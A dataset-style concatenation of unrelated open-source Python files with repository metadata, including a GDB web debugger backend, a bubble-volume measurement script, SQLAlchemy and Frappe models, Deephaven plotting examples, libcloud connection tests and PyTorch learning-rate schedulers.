stop_queue = asyncio.Queue()
gdb_sessions[sid] = await GDBProcess.create(runnable, stop_queue, env={'KEY': access_key}, log_fn=log)
loop = asyncio.get_event_loop()
stop_queue_readers[sid] = loop.create_task(stop_queue_reader(sid, stop_queue))
async def delete_gdb_process(sid):
if sid in gdb_sessions:
stop_queue_readers[sid].cancel()
del stop_queue_readers[sid]
await gdb_sessions[sid].release()
del gdb_sessions[sid]
@sio.on('start')
async def start(sid):
await delete_gdb_process(sid)
await create_gdb_process(sid)
# Reading registers doesn't work on ubuntu 18.04 for some reason.
# Step once as a work around
step(sid)
async def update_all(sid):
log('updating sid {}'.format(sid))
regs_task = getregs(sid)
maps_task = getmaps(sid)
asm_task = getasm(sid, {'addr': await gdb_sessions[sid].get_reg('rip'), 'count': 100})
await asyncio.gather(regs_task, maps_task, asm_task)
log('update done')
@sio.on('step')
def step(sid):
gdb_sessions[sid].step()
@sio.on('cont')
def cont(sid):
gdb_sessions[sid].cont()
@sio.on('stop')
def stop(sid):
gdb_sessions[sid].interrupt()
async def getregs(sid):
regs = await gdb_sessions[sid].get_regs()
await sio.emit('regs', regs, room=sid)
@sio.on('mem')
async def getmem(sid, msg):
addr = msg['addr']
count = msg['count']
data = gdb_sessions[sid].read_mem(addr, count)
await sio.emit('mem', {'addr': addr, 'data': data}, room=sid)
async def getmaps(sid):
maps = gdb_sessions[sid].maps()
await sio.emit('maps', maps, room=sid)
@sio.on('break')
async def setbreakpoint(sid, data):
addr = data['addr']
await gdb_sessions[sid].set_breakpoint(addr)
await sio.emit('breakpoints', gdb_sessions[sid].breakpoints(), room=sid)
@sio.on('unbreak')
async def rmbreakpoint(sid, data):
addr = data['addr']
await gdb_sessions[sid].remove_breakpoint(addr)
await sio.emit('breakpoints', gdb_sessions[sid].breakpoints(), room=sid)
@sio.on('search')
async def search(sid, data):
q = data['q']
qtype = data['type']
await sio.emit('search_result', gdb_sessions[sid].search(q.encode(), qtype), room=sid)
async def getasm(sid, data):
addr = data['addr']
count = data['count']
result = []
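  # Linear disassembly: read MAX_INSN_LEN bytes at the current address, decode one
  # instruction with Capstone, then advance by the decoded instruction's size.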
for _ in range(count):
data = gdb_sessions[sid].read_mem(addr, MAX_INSN_LEN)
try:
disasm = next(capstone_md.disasm_lite(data, addr))
except StopIteration:
break
result.append(disasm)
addr += disasm[1]
await sio.emit('asm', result, room=sid)
if __name__ == '__main__':
web.run_app(app)
| 27.960227 | 104 | 0.710018 |
b930187de467bdc99d38231d4b217f6589a62613 | 2,039 | py | Python | starteMessung.py | jkerpe/TroubleBubble | 813ad797398b9f338f136bcb96c6c92186d92ebf | [
"MIT"
] | null | null | null | starteMessung.py | jkerpe/TroubleBubble | 813ad797398b9f338f136bcb96c6c92186d92ebf | [
"MIT"
] | null | null | null | starteMessung.py | jkerpe/TroubleBubble | 813ad797398b9f338f136bcb96c6c92186d92ebf | [
"MIT"
] | 1 | 2021-08-09T14:57:57.000Z | 2021-08-09T14:57:57.000Z | from datetime import datetime
from pypylon import pylon
import nimmAuf
import smbus2
import os
import argparse
import bestimmeVolumen
from threading import Thread
import time
programmstart = time.time()
# Parse command-line arguments (e.g. run 'starteMessung.py -n 100' in the terminal)
ap = argparse.ArgumentParser(description="""Skript zum Aufnehmen von Bildern der Teststrecke und der
Volumenbestimmung von Luftblasen""")
ap.add_argument("-n", "--number", default=400, type=int, help="Anzahl an Frames die aufgenommen werden sollen. Default: 400 Bilder")
ap.add_argument("-fr", "--framerate", default=100, type=int, help="Framerate in fps. Richtwerte: <Flow 3 ml/s:50 fps, 3-6ml/s:100 fps, >6ml/s:200 fps; Default: 100 fps")
args = vars(ap.parse_args())
# Extract the parsed arguments
numberOfImagesToGrab = args['number']
framerate = args['framerate']
if __name__ == '__main__':
startzeit = time.time()
    #Test whether a camera is connected
devices = pylon.TlFactory.GetInstance().EnumerateDevices()
if len(devices) == 0:
print("Keine Kamera angeschlossen oder Kamera woanders geöffnet.")
        exit()
    # Test whether the pressure sensor is connected
try:
bus = smbus2.SMBus(0)
        bus.read_i2c_block_data(0x40, 0, 2) # receive 2 bytes
except OSError:
print("Kein Drucksensor angeschlossen")
exit()
    # Generate a unique directory name from the current time and the parameters
dirname = f'{datetime.now().strftime("%Y-%m-%d-%H-%M-%S")}'
    os.mkdir(dirname) # create the directory
print(f"Ordnername: {dirname}")
beginn = time.time()-programmstart
    # Start the capture and processing threads
t_aufnahme = Thread(target=nimmAuf.starte, args=(dirname, numberOfImagesToGrab, framerate, startzeit))
t_tracke = Thread(target=bestimmeVolumen.tracke, args=(dirname, numberOfImagesToGrab))
t_aufnahme.start()
t_tracke.start()
t_aufnahme.join()
t_tracke.join()
| 34.559322 | 169 | 0.703776 |
b978fbbcd4002601ca1e2723cae4385002e671d8 | 2,063 | py | Python | src/onegov/translator_directory/models/language.py | politbuero-kampagnen/onegov-cloud | 20148bf321b71f617b64376fe7249b2b9b9c4aa9 | [
"MIT"
] | null | null | null | src/onegov/translator_directory/models/language.py | politbuero-kampagnen/onegov-cloud | 20148bf321b71f617b64376fe7249b2b9b9c4aa9 | [
"MIT"
] | null | null | null | src/onegov/translator_directory/models/language.py | politbuero-kampagnen/onegov-cloud | 20148bf321b71f617b64376fe7249b2b9b9c4aa9 | [
"MIT"
] | null | null | null | from uuid import uuid4
from sqlalchemy import Index, Column, Text, Table, ForeignKey
from sqlalchemy.orm import object_session
from onegov.core.orm import Base
from onegov.core.orm.types import UUID
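# Association tables for the many-to-many relations between translators and
# languages (spoken, written, mother tongue).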
spoken_association_table = Table(
'spoken_lang_association',
Base.metadata,
Column(
'translator_id',
UUID,
ForeignKey('translators.id'),
nullable=False),
Column('lang_id', UUID, ForeignKey('languages.id'), nullable=False)
)
written_association_table = Table(
'written_lang_association',
Base.metadata,
Column(
'translator_id',
UUID,
ForeignKey('translators.id'),
nullable=False),
Column('lang_id', UUID, ForeignKey('languages.id'), nullable=False)
)
mother_tongue_association_table = Table(
'mother_tongue_association',
Base.metadata,
Column(
'translator_id',
UUID,
ForeignKey('translators.id'),
nullable=False),
Column('lang_id', UUID, ForeignKey('languages.id'), nullable=False)
)
class Language(Base):
__tablename__ = 'languages'
__table_args__ = (
Index('unique_name', 'name', unique=True),
)
id = Column(UUID, primary_key=True, default=uuid4)
name = Column(Text, nullable=False)
@property
def speakers_count(self):
session = object_session(self)
return session.query(
spoken_association_table).filter_by(lang_id=self.id).count()
@property
def writers_count(self):
session = object_session(self)
return session.query(
written_association_table).filter_by(lang_id=self.id).count()
@property
def native_speakers_count(self):
"""Having it as mother tongue..."""
session = object_session(self)
return session.query(
mother_tongue_association_table).filter_by(lang_id=self.id).count()
@property
def deletable(self):
return (
self.speakers_count
+ self.writers_count
+ self.native_speakers_count
) == 0
| 25.469136 | 79 | 0.650994 |
b9b2dd8fc97fddaaa64ec64957043ee8e8088e39 | 615 | py | Python | frappe-bench/apps/erpnext/erpnext/non_profit/doctype/member/member.py | Semicheche/foa_frappe_docker | a186b65d5e807dd4caf049e8aeb3620a799c1225 | [
"MIT"
] | null | null | null | frappe-bench/apps/erpnext/erpnext/non_profit/doctype/member/member.py | Semicheche/foa_frappe_docker | a186b65d5e807dd4caf049e8aeb3620a799c1225 | [
"MIT"
] | null | null | null | frappe-bench/apps/erpnext/erpnext/non_profit/doctype/member/member.py | Semicheche/foa_frappe_docker | a186b65d5e807dd4caf049e8aeb3620a799c1225 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
# Copyright (c) 2017, Frappe Technologies Pvt. Ltd. and contributors
# For license information, please see license.txt
from __future__ import unicode_literals
from frappe.model.document import Document
from frappe.contacts.address_and_contact import load_address_and_contact
class Member(Document):
def onload(self):
"""Load address and contacts in `__onload`"""
load_address_and_contact(self)
def validate(self):
self.validate_email_type(self.email)
def validate_email_type(self, email):
from frappe.utils import validate_email_add
validate_email_add(email.strip(), True) | 29.285714 | 72 | 0.786992 |
0ec1afd2facbda8f3febe8ca1dc7c71fb6558f04 | 1,993 | py | Python | packages/watchmen-data-kernel/src/watchmen_data_kernel/meta/external_writer_service.py | Indexical-Metrics-Measure-Advisory/watchmen | c54ec54d9f91034a38e51fd339ba66453d2c7a6d | [
"MIT"
] | null | null | null | packages/watchmen-data-kernel/src/watchmen_data_kernel/meta/external_writer_service.py | Indexical-Metrics-Measure-Advisory/watchmen | c54ec54d9f91034a38e51fd339ba66453d2c7a6d | [
"MIT"
] | null | null | null | packages/watchmen-data-kernel/src/watchmen_data_kernel/meta/external_writer_service.py | Indexical-Metrics-Measure-Advisory/watchmen | c54ec54d9f91034a38e51fd339ba66453d2c7a6d | [
"MIT"
] | null | null | null | from typing import Optional
from watchmen_auth import PrincipalService
from watchmen_data_kernel.cache import CacheService
from watchmen_data_kernel.common import DataKernelException
from watchmen_data_kernel.external_writer import find_external_writer_create, register_external_writer_creator
from watchmen_meta.common import ask_meta_storage, ask_snowflake_generator
from watchmen_meta.system import ExternalWriterService as ExternalWriterStorageService
from watchmen_model.common import ExternalWriterId
from watchmen_model.system import ExternalWriter
def register_external_writer(external_writer: ExternalWriter) -> None:
create = find_external_writer_create(external_writer.type)
if create is None:
raise DataKernelException(f'Creator not found for external writer[{external_writer.dict()}].')
register_external_writer_creator(external_writer.writerCode, create())
class ExternalWriterService:
def __init__(self, principal_service: PrincipalService):
self.principalService = principal_service
def find_by_id(self, writer_id: ExternalWriterId) -> Optional[ExternalWriter]:
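		# Check the tenant-scoped cache first; on a miss, load the writer from meta
		# storage and populate the cache before registering its creator.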
external_writer = CacheService.external_writer().get(writer_id)
if external_writer is not None:
if external_writer.tenantId != self.principalService.get_tenant_id():
raise DataKernelException(
f'External writer[id={writer_id}] not belongs to '
f'current tenant[id={self.principalService.get_tenant_id()}].')
register_external_writer(external_writer)
return external_writer
storage_service = ExternalWriterStorageService(
ask_meta_storage(), ask_snowflake_generator(), self.principalService)
storage_service.begin_transaction()
try:
# noinspection PyTypeChecker
external_writer: ExternalWriter = storage_service.find_by_id(writer_id)
if external_writer is None:
return None
CacheService.external_writer().put(external_writer)
register_external_writer(external_writer)
return external_writer
finally:
storage_service.close_transaction()
| 41.520833 | 110 | 0.831912 |
16abab9c314c051765ffd991fb6c764e6cf24cb5 | 235 | py | Python | solutions/pic_search/webserver/src/service/theardpool.py | naetimus/bootcamp | 0182992df7c54012944b51fe9b70532ab6a0059b | [
"Apache-2.0"
] | 1 | 2020-03-10T07:43:08.000Z | 2020-03-10T07:43:08.000Z | solutions/pic_search/webserver/src/service/theardpool.py | naetimus/bootcamp | 0182992df7c54012944b51fe9b70532ab6a0059b | [
"Apache-2.0"
] | null | null | null | solutions/pic_search/webserver/src/service/theardpool.py | naetimus/bootcamp | 0182992df7c54012944b51fe9b70532ab6a0059b | [
"Apache-2.0"
] | 1 | 2020-04-03T05:24:47.000Z | 2020-04-03T05:24:47.000Z | import threading
from concurrent.futures import ThreadPoolExecutor
from service.train import do_train
def thread_runner(thread_num, func, *args):
executor = ThreadPoolExecutor(thread_num)
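    # Submit the training job to the pool; it runs asynchronously on a worker thread.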
f = executor.submit(do_train, *args)
| 26.111111 | 49 | 0.795745 |
4c0f174360fe29201e22d16e102aa2c61bad20f2 | 262 | py | Python | production/pygsl-0.9.5/testing/__init__.py | juhnowski/FishingRod | 457e7afb5cab424296dff95e1acf10ebf70d32a9 | [
"MIT"
] | 1 | 2019-07-29T02:53:51.000Z | 2019-07-29T02:53:51.000Z | production/pygsl-0.9.5/testing/__init__.py | juhnowski/FishingRod | 457e7afb5cab424296dff95e1acf10ebf70d32a9 | [
"MIT"
] | 1 | 2021-09-11T14:30:32.000Z | 2021-09-11T14:30:32.000Z | Dockerfiles/gedlab-khmer-filter-abund/pymodules/python2.7/lib/python/pygsl/testing/__init__.py | poojavade/Genomics_Docker | 829b5094bba18bbe03ae97daf925fee40a8476e8 | [
"Apache-2.0"
] | 2 | 2016-12-19T02:27:46.000Z | 2019-07-29T02:53:54.000Z | """
Here you find either newly implemented modules or alternate implementations
of already existing modules. This directory is intended to hold a second
implementation beside the main implementation, so that there can be a
discussion about which implementation to favor in the long run.
"""
| 37.428571 | 78 | 0.80916 |
5de70a07393091d4b0d1b81bb83f4335c31b6482 | 3,329 | py | Python | Plot/src/test/java/io/deephaven/db/plot/example_plots/PlottingPQ.py | devinrsmith/deephaven-core | 3a6930046faf1cd556f62a914ce1cfd7860147b9 | [
"MIT"
] | null | null | null | Plot/src/test/java/io/deephaven/db/plot/example_plots/PlottingPQ.py | devinrsmith/deephaven-core | 3a6930046faf1cd556f62a914ce1cfd7860147b9 | [
"MIT"
] | 1 | 2022-03-03T21:24:40.000Z | 2022-03-03T21:24:54.000Z | Plot/src/test/java/io/deephaven/db/plot/example_plots/PlottingPQ.py | devinrsmith/deephaven-core | 3a6930046faf1cd556f62a914ce1cfd7860147b9 | [
"MIT"
] | null | null | null | import deephaven.TableTools as tt
import deephaven.Plot as plt
t = tt.emptyTable(50)\
.update("X = i + 5", "XLow = X -1", "XHigh = X + 1", "Y = Math.random() * 5", "YLow = Y - 1", "YHigh = Y + 1", "USym = i % 2 == 0 ? `AAPL` : `MSFT`")
p = plt.plot("S1", t, "X", "Y").lineColor("black").show()
p2 = plt.plot("S1", t, "X", "Y").plotStyle("bar").gradientVisible(True).show()
p3 = plt.plot("S1", t, "X", "Y").plotStyle("scatter").pointColor("black").pointSize(2).show()
p4 = plt.plot("S1", t, "X", "Y").plotStyle("area").seriesColor("red").show()
p4 = plt.plot3d("S1", t, "X", "X", "Y").show()
pBy = plt.plotBy("S1", t, "X", "Y", "USym").show()
pBy = plt.plot3dBy("S1", t, "X", "X", "Y", "USym").show()
cp = plt.catPlot("S1", t, "X", "Y").lineColor("black").show()
cp2 = plt.catPlot("S1", t, "X", "Y").plotStyle("bar").gradientVisible(True).show()
cp3 = plt.catPlot("S1", t, "X", "Y").plotStyle("scatter").pointColor("black").pointSize(2).show()
cp4 = plt.catPlot("S1", t, "X", "Y").plotStyle("area").seriesColor("red").show()
cp = plt.catPlot3d("S1", t, "X", "X", "Y").show()
cpBy = plt.catPlotBy("S1", t, "X", "Y", "USym").show()
cpBy = plt.catPlot3dBy("S1", t, "X", "X", "Y", "USym").show()
pp = plt.piePlot("S1", t, "X", "Y")
chp = plt.catHistPlot("S1", t, "X").show()
hp = plt.histPlot("S1", t, "X", 5).show()
hp = plt.histPlot("S1", t, "X", 0, 10, 5).show()
ep = plt.errorBarXY("S1", t, "X", "XLow", "XHigh", "Y", "YLow", "YHigh").show()
epBy = plt.errorBarXYBy("S1", t, "X", "XLow", "XHigh", "Y", "YLow", "YHigh", "USym").show()
ep2 = plt.errorBarX("S1", t, "X", "XLow", "XHigh", "Y").show()
epBy2 = plt.errorBarXBy("S1", t, "X", "XLow", "XHigh", "Y", "USym").show()
ep3 = plt.errorBarY("S1", t, "X", "Y", "YLow", "YHigh").show()
epBy3 = plt.errorBarYBy("S1", t, "X", "Y", "YLow", "YHigh", "USym").show()
doubles = [3, 4, 3, 5, 4, 5]
time = 1491946585000000000
t = tt.newTable(tt.col("USym", ["A", "B", "A", "B", "A", "B"]),
tt.doubleCol("Open", doubles), tt.doubleCol("High", doubles),
tt.doubleCol("Low", doubles), tt.doubleCol("Close", doubles))
t = t.updateView("Time = new DBDateTime(time + (MINUTE * i))")
ohlc = plt.ohlcPlot("Test1", t, "Time", "Open", "High", "Low", "Close")
ohlcPlotBy = plt.figure().newChart(0)\
.chartTitle("Chart Title")\
.newAxes()\
.xLabel("X")\
.yLabel("Y")\
.ohlcPlotBy("Test1", t, "Time", "Open", "High", "Low", "Close", "USym")
categories = ["Samsung", "Others", "Nokia", "Apple", "MSFT"]
valuesD = [27.8, 55.3, 16.8, 17.1, 23.1]
valuesI = [27, 55, 16, 17, 15]
ap = plt.plot("S1", valuesD, valuesI).show()
ap = plt.plot3d("S1", valuesI, valuesI, valuesI).show()
acp = plt.catPlot("S1", categories, valuesI).show()
acp2 = plt.catPlot3d("S1", categories, categories, valuesD).show()
achp = plt.catHistPlot("S1", categories).show()
app = plt.figure().xLabel("X").yLabel("Y").piePlot("S1", categories, valuesI).pointLabelFormat("{0}").show()
aep = plt.errorBarXY("S1", valuesD, valuesD, valuesD, valuesD, valuesD, valuesD).show()
aep2 = plt.errorBarX("S1", valuesD, valuesD, valuesD, valuesD).show()
aep3 = plt.errorBarY("S1", valuesD, valuesD, valuesD, valuesD).show()
hp = plt.histPlot("S1", valuesD, 5).show()
hp = plt.histPlot("S1", valuesD, 0, 10, 5).show()
hp = plt.histPlot("S1", valuesI, 5).show()
| 37.829545 | 153 | 0.578252 |
5df79191a02e9cdc36eab83fa9b24e2f2d9fe213 | 7,695 | py | Python | Dockerfiles/gedlab-khmer-filter-abund/pymodules/python2.7/lib/python/apache_libcloud-0.15.1-py2.7.egg/libcloud/test/test_connection.py | poojavade/Genomics_Docker | 829b5094bba18bbe03ae97daf925fee40a8476e8 | [
"Apache-2.0"
] | 1 | 2019-07-29T02:53:51.000Z | 2019-07-29T02:53:51.000Z | libcloud/test/test_connection.py | elastacloud/libcloud | f3792b2dca835c548bdbce0da2eb71bfc9463b72 | [
"Apache-2.0"
] | 1 | 2021-09-11T14:30:32.000Z | 2021-09-11T14:30:32.000Z | libcloud/test/test_connection.py | elastacloud/libcloud | f3792b2dca835c548bdbce0da2eb71bfc9463b72 | [
"Apache-2.0"
] | 2 | 2016-12-19T02:27:46.000Z | 2019-07-29T02:53:54.000Z | # -*- coding: utf-8 -*-
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import sys
import ssl
from mock import Mock, call
from libcloud.test import unittest
from libcloud.common.base import Connection
from libcloud.common.base import LoggingConnection
class ConnectionClassTestCase(unittest.TestCase):
def setUp(self):
self.originalConnect = Connection.connect
self.originalResponseCls = Connection.responseCls
Connection.connect = Mock()
Connection.responseCls = Mock()
Connection.allow_insecure = True
def tearDown(self):
Connection.connect = self.originalConnect
        Connection.responseCls = self.originalResponseCls
Connection.allow_insecure = True
def test_dont_allow_insecure(self):
Connection.allow_insecure = True
Connection(secure=False)
Connection.allow_insecure = False
expected_msg = (r'Non https connections are not allowed \(use '
                        r'secure=True\)')
self.assertRaisesRegexp(ValueError, expected_msg, Connection,
secure=False)
def test_content_length(self):
con = Connection()
con.connection = Mock()
# GET method
# No data, no content length should be present
con.request('/test', method='GET', data=None)
call_kwargs = con.connection.request.call_args[1]
self.assertTrue('Content-Length' not in call_kwargs['headers'])
# '' as data, no content length should be present
con.request('/test', method='GET', data='')
call_kwargs = con.connection.request.call_args[1]
self.assertTrue('Content-Length' not in call_kwargs['headers'])
# 'a' as data, content length should be present (data in GET is not
# correct, but anyways)
con.request('/test', method='GET', data='a')
call_kwargs = con.connection.request.call_args[1]
self.assertEqual(call_kwargs['headers']['Content-Length'], '1')
# POST, PUT method
# No data, content length should be present
for method in ['POST', 'PUT', 'post', 'put']:
con.request('/test', method=method, data=None)
call_kwargs = con.connection.request.call_args[1]
self.assertEqual(call_kwargs['headers']['Content-Length'], '0')
# '' as data, content length should be present
for method in ['POST', 'PUT', 'post', 'put']:
con.request('/test', method=method, data='')
call_kwargs = con.connection.request.call_args[1]
self.assertEqual(call_kwargs['headers']['Content-Length'], '0')
# No data, raw request, do not touch Content-Length if present
for method in ['POST', 'PUT', 'post', 'put']:
con.request('/test', method=method, data=None,
headers={'Content-Length': '42'}, raw=True)
putheader_call_list = con.connection.putheader.call_args_list
self.assertIn(call('Content-Length', '42'), putheader_call_list)
# '' as data, raw request, do not touch Content-Length if present
for method in ['POST', 'PUT', 'post', 'put']:
con.request('/test', method=method, data=None,
headers={'Content-Length': '42'}, raw=True)
putheader_call_list = con.connection.putheader.call_args_list
self.assertIn(call('Content-Length', '42'), putheader_call_list)
# 'a' as data, content length should be present
for method in ['POST', 'PUT', 'post', 'put']:
con.request('/test', method=method, data='a')
call_kwargs = con.connection.request.call_args[1]
self.assertEqual(call_kwargs['headers']['Content-Length'], '1')
def test_cache_busting(self):
params1 = {'foo1': 'bar1', 'foo2': 'bar2'}
params2 = [('foo1', 'bar1'), ('foo2', 'bar2')]
con = Connection()
con.connection = Mock()
con.pre_connect_hook = Mock()
con.pre_connect_hook.return_value = {}, {}
con.cache_busting = False
con.request(action='/path', params=params1)
args, kwargs = con.pre_connect_hook.call_args
self.assertFalse('cache-busting' in args[0])
self.assertEqual(args[0], params1)
con.request(action='/path', params=params2)
args, kwargs = con.pre_connect_hook.call_args
self.assertFalse('cache-busting' in args[0])
self.assertEqual(args[0], params2)
con.cache_busting = True
con.request(action='/path', params=params1)
args, kwargs = con.pre_connect_hook.call_args
self.assertTrue('cache-busting' in args[0])
con.request(action='/path', params=params2)
args, kwargs = con.pre_connect_hook.call_args
self.assertTrue('cache-busting' in args[0][len(params2)])
def test_context_is_reset_after_request_has_finished(self):
context = {'foo': 'bar'}
def responseCls(connection, response):
connection.called = True
self.assertEqual(connection.context, context)
con = Connection()
con.called = False
con.connection = Mock()
con.responseCls = responseCls
con.set_context(context)
self.assertEqual(con.context, context)
con.request('/')
# Context should have been reset
self.assertTrue(con.called)
self.assertEqual(con.context, {})
# Context should also be reset if a method inside request throws
con = Connection()
con.connection = Mock()
con.set_context(context)
self.assertEqual(con.context, context)
con.connection.request = Mock(side_effect=ssl.SSLError())
try:
con.request('/')
except ssl.SSLError:
pass
self.assertEqual(con.context, {})
con.connection = Mock()
con.set_context(context)
self.assertEqual(con.context, context)
con.responseCls = Mock(side_effect=ValueError())
try:
con.request('/')
except ValueError:
pass
self.assertEqual(con.context, {})
def test_log_curl(self):
url = '/test/path'
body = None
headers = {}
con = LoggingConnection()
con.protocol = 'http'
con.host = 'example.com'
con.port = 80
for method in ['GET', 'POST', 'PUT', 'DELETE']:
cmd = con._log_curl(method=method, url=url, body=body,
headers=headers)
self.assertEqual(cmd, 'curl -i -X %s --compress http://example.com:80/test/path' %
(method))
# Should use --head for head requests
cmd = con._log_curl(method='HEAD', url=url, body=body, headers=headers)
self.assertEqual(cmd, 'curl -i --head --compress http://example.com:80/test/path')
if __name__ == '__main__':
sys.exit(unittest.main())
| 36.995192 | 94 | 0.624172 |
f8d46f993d25bd7f9f34660f23bf18928f5a3963 | 5,672 | py | Python | module/classification_package/src/utils.py | fishial/Object-Detection-Model | 4792f65ea785156a8e240d9cdbbc0c9d013ea0bb | [
"CC0-1.0"
] | 1 | 2022-01-03T14:00:17.000Z | 2022-01-03T14:00:17.000Z | module/classification_package/src/utils.py | fishial/Object-Detection-Model | 4792f65ea785156a8e240d9cdbbc0c9d013ea0bb | [
"CC0-1.0"
] | null | null | null | module/classification_package/src/utils.py | fishial/Object-Detection-Model | 4792f65ea785156a8e240d9cdbbc0c9d013ea0bb | [
"CC0-1.0"
] | 1 | 2021-12-21T09:50:53.000Z | 2021-12-21T09:50:53.000Z | import numpy as np
import logging
import numbers
import torch
import math
import json
import sys
from torch.optim.lr_scheduler import LambdaLR
from torchvision.transforms.functional import pad
class AverageMeter(object):
"""Computes and stores the average and current value"""
def __init__(self):
self.reset()
def reset(self):
self.val = 0
self.avg = 0
self.sum = 0
self.count = 0
def update(self, val, n=1):
self.val = val
self.sum += val * n
self.count += n
self.avg = self.sum / self.count
class ConstantLRSchedule(LambdaLR):
""" Constant learning rate schedule.
"""
def __init__(self, optimizer, last_epoch=-1):
super(ConstantLRSchedule, self).__init__(optimizer, lambda _: 1.0, last_epoch=last_epoch)
class WarmupConstantSchedule(LambdaLR):
""" Linear warmup and then constant.
Linearly increases learning rate schedule from 0 to 1 over `warmup_steps` training steps.
Keeps learning rate schedule equal to 1. after warmup_steps.
"""
def __init__(self, optimizer, warmup_steps, last_epoch=-1):
self.warmup_steps = warmup_steps
super(WarmupConstantSchedule, self).__init__(optimizer, self.lr_lambda, last_epoch=last_epoch)
def lr_lambda(self, step):
if step < self.warmup_steps:
return float(step) / float(max(1.0, self.warmup_steps))
return 1.
class WarmupLinearSchedule(LambdaLR):
""" Linear warmup and then linear decay.
Linearly increases learning rate from 0 to 1 over `warmup_steps` training steps.
Linearly decreases learning rate from 1. to 0. over remaining `t_total - warmup_steps` steps.
"""
def __init__(self, optimizer, warmup_steps, t_total, last_epoch=-1):
self.warmup_steps = warmup_steps
self.t_total = t_total
super(WarmupLinearSchedule, self).__init__(optimizer, self.lr_lambda, last_epoch=last_epoch)
def lr_lambda(self, step):
if step < self.warmup_steps:
return float(step) / float(max(1, self.warmup_steps))
return max(0.0, float(self.t_total - step) / float(max(1.0, self.t_total - self.warmup_steps)))
class WarmupCosineSchedule(LambdaLR):
""" Linear warmup and then cosine decay.
Linearly increases learning rate from 0 to 1 over `warmup_steps` training steps.
Decreases learning rate from 1. to 0. over remaining `t_total - warmup_steps` steps following a cosine curve.
If `cycles` (default=0.5) is different from default, learning rate follows cosine function after warmup.
"""
def __init__(self, optimizer, warmup_steps, t_total, cycles=.5, last_epoch=-1):
self.warmup_steps = warmup_steps
self.t_total = t_total
self.cycles = cycles
super(WarmupCosineSchedule, self).__init__(optimizer, self.lr_lambda, last_epoch=last_epoch)
def lr_lambda(self, step):
if step < self.warmup_steps:
return float(step) / float(max(1.0, self.warmup_steps))
# progress after warmup
progress = float(step - self.warmup_steps) / float(max(1, self.t_total - self.warmup_steps))
return max(0.0, 0.5 * (1. + math.cos(math.pi * float(self.cycles) * 2.0 * progress)))
def get_padding(image):
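    # Padding needed to make the image square: pad the shorter side up to
    # max(width, height), splitting any odd pixel between the two edges.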
w, h = image.size
max_wh = np.max([w, h])
h_padding = (max_wh - w) / 2
v_padding = (max_wh - h) / 2
l_pad = h_padding if h_padding % 1 == 0 else h_padding + 0.5
t_pad = v_padding if v_padding % 1 == 0 else v_padding + 0.5
r_pad = h_padding if h_padding % 1 == 0 else h_padding - 0.5
b_pad = v_padding if v_padding % 1 == 0 else v_padding - 0.5
padding = (int(l_pad), int(t_pad), int(r_pad), int(b_pad))
return padding
class NewPad(object):
def __init__(self, fill=0, padding_mode='constant'):
assert isinstance(fill, (numbers.Number, str, tuple))
assert padding_mode in ['constant', 'edge', 'reflect', 'symmetric']
self.fill = fill
self.padding_mode = padding_mode
def __call__(self, img):
"""
Args:
img (PIL Image): Image to be padded.
Returns:
PIL Image: Padded image.
"""
return pad(img, get_padding(img), self.fill, self.padding_mode)
def __repr__(self):
        return self.__class__.__name__ + '(fill={0}, padding_mode={1})'. \
format(self.fill, self.padding_mode)
def find_device():
device = torch.device("cuda:0" if torch.cuda.is_available() else "cpu")
return device
def read_json(data):
with open(data) as f:
return json.load(f)
def save_json(data, path):
with open(path, 'w', encoding='utf-8') as f:
json.dump(data, f)
def setup_logger():
logger = logging.getLogger('train')
logger.setLevel(logging.INFO)
if len(logger.handlers) == 0:
formatter = logging.Formatter('%(asctime)s | %(message)s')
ch = logging.StreamHandler(stream=sys.stdout)
ch.setFormatter(formatter)
logger.addHandler(ch)
return logger
def adjust_learning_rate(optimizer, epoch, lr):
"""Sets the learning rate to the initial LR decayed by 10 every 30 epochs"""
lr = lr * (0.1 ** (epoch // 30))
for param_group in optimizer.param_groups:
param_group['lr'] = lr
def save_checkpoint(model, path):
torch.save(model.state_dict(), path)
def reverse_norm_image(image):
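    # Undo the ImageNet mean/std normalization and convert the CHW tensor
    # to an HWC numpy array for display.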
MEAN = torch.tensor([0.485, 0.456, 0.406])
STD = torch.tensor([0.229, 0.224, 0.225])
reverse_image = image * STD[:, None, None] + MEAN[:, None, None]
return reverse_image.permute(1, 2, 0).cpu().numpy() | 33.761905 | 117 | 0.653738 |
5d1d5be9e9e0382909fb3777ed89becc272c0e93 | 767 | py | Python | Kapitel_1/_1_public_private.py | Geralonx/Classes_Tutorial | 9499db8159efce1e3c38975b66a9c649631c6727 | [
"MIT"
] | 1 | 2020-12-24T15:42:54.000Z | 2020-12-24T15:42:54.000Z | Kapitel_1/_1_public_private.py | Geralonx/Classes_Tutorial | 9499db8159efce1e3c38975b66a9c649631c6727 | [
"MIT"
] | null | null | null | Kapitel_1/_1_public_private.py | Geralonx/Classes_Tutorial | 9499db8159efce1e3c38975b66a9c649631c6727 | [
"MIT"
] | null | null | null | # --- Class declaration with constructor --- #
class PC:
def __init__(self, cpu, gpu, ram):
self.cpu = cpu
self.gpu = gpu
self.__ram = ram
# --- Instantiating a class --- #
# --- I prefer initialization with keyword arguments --- #
pc_instanz = PC(cpu='Ryzen 7', gpu='RTX2070Super', ram='GSkill')
# --- Accessing normal _public_ attributes --- #
print(pc_instanz.cpu)
print(pc_instanz.gpu)
# --- Accessing a _private_ attribute --- #
# Commented out because it raises an AttributeError.
# print(pc_instanz.__ram)
# --- Accessing the instance dictionary to obtain that instance's contents. --- #
print(pc_instanz.__dict__)
# --- Accessing the actually _private_ attribute. --- #
print(pc_instanz._PC__ram)
| 29.5 | 89 | 0.684485 |
5d66ef032fbd2dcf091b5ffde482a5d596613146 | 1,940 | py | Python | bin/write2cly.py | docdiesel/smartmetertools | 3b7449c7a9069696af078631aa5440f53d0f57bc | [
"MIT"
] | 1 | 2019-05-30T08:28:31.000Z | 2019-05-30T08:28:31.000Z | bin/write2cly.py | docdiesel/smartmetertools | 3b7449c7a9069696af078631aa5440f53d0f57bc | [
"MIT"
